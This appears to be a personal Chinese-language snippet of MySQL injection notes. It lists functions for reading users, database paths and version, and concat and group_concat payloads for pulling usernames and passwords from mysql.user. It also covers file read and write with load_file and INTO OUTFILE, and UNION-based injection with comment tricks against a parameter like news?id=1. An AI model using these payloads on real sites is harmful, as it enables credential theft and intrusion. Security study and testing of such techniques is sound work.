MySQL_Injection_base

7/22/2016 - 4:14 PM

MySQL

系统数据:
  user()          当前用户
  database()      当前数据库
  version()       SQL版本号,最后为系统版本(nt-windows)
  @@datadir       数据库路径
连接型:
  concat()        concat(username,0x3a, password))
  group_concat()   select group_concat(DISTINCT file_priv, user) from mysql.user; //多个用户情况下, 查看load_file()权限
  concat_ws()     与上类似
编码:
  hex(), unhex()  防止乱码 union select hex(password) from mysql.user `不需要select`
文件:
  load_file()     需要文件读取权限, Linux版本的这个我还没法实现...Orz  
select XXX into outfile YOURPATH

### 猜字段
存在的站点:xxxnews?id=1
>
SELECT 1,2,3,4 FROM news WHERE id=1 ORDER BY date DESC

注入之后
>
SELECT 1,2,3,4 FROM news WHERE id=]1 UNION SELECT 1,2,3,4 FROM admin [ORDER BY date DESC

admin 可能不存在date, 所以需要注释
>
SELECT 1,2,3,4 FROM news WHERE id=]1 UNION SELECT 1,2,3,4 FROM admin `-- / /*`[ORDER BY date DESC

Cacher is the code snippet organizer for pro developers

We empower you and your team to get more done, faster

MySQL_Injection_base